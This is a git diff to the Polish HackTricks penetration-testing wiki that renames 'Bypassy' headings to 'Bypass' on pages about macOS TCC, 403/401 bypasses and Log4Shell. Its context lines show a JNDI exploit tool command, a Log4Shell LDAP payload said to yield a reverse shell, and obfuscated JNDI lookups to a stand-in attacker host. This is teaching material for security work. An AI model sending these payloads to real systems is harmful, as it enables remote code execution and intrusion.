diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md index c4ef28a26..2ca99467d 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md @@ -256,7 +256,7 @@ uuid 769FD8F1-90E0-3206-808C-A8947BEBD6C3 Rozszerzony atrybut `com.apple.macl` **nie może być usunięty** jak inne rozszerzone atrybuty, ponieważ jest **chroniony przez SIP**. Jednak, jak [**wyjaśniono w tym poście**](https://www.brunerd.com/blog/2020/01/07/track-and-tackle-com-apple-macl/), możliwe jest jego wyłączenie **zipując** plik, **usuwając** go i **rozpakowując** go. -## TCC Privesc & Bypassy +## TCC Privesc & Bypass ### Wstaw do TCC @@ -554,10 +554,10 @@ AllowApplicationsList.plist: ``` -### TCC Bypassy +### TCC Bypass {{#ref}} -macos-tcc-bypassy/ +macos-tcc-bypasses/ {{#endref}} ## Odniesienia diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md index 07811d656..18207f903 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md @@ -1,4 +1,4 @@ -# macOS TCC Bypassy +# macOS TCC Bypass {{#include ../../../../../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/pentesting-web/403-and-401-bypasses.md b/src/network-services-pentesting/pentesting-web/403-and-401-bypasses.md index c26364bd1..df18ff84e 100644 --- a/src/network-services-pentesting/pentesting-web/403-and-401-bypasses.md +++ b/src/network-services-pentesting/pentesting-web/403-and-401-bypasses.md @@ -1,4 +1,4 @@ -# 403 & 401 Bypassy +# 403 & 401 Bypass {{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md b/src/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md index c325f5627..9e22dad49 100644 --- a/src/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md +++ b/src/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md @@ -311,7 +311,7 @@ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -L 10.10.14.10:1389 -P /tm Teraz możesz łatwo użyć wygenerowanego linku JNDI, aby wykorzystać lukę i uzyskać **reverse shell**, wysyłając do podatnej wersji log4j: **`${ldap://10.10.14.10:1389/generated}`** -### Bypassy +### Bypass ```java ${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//attackerendpoint.com/} ${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attackerendpoint.com/}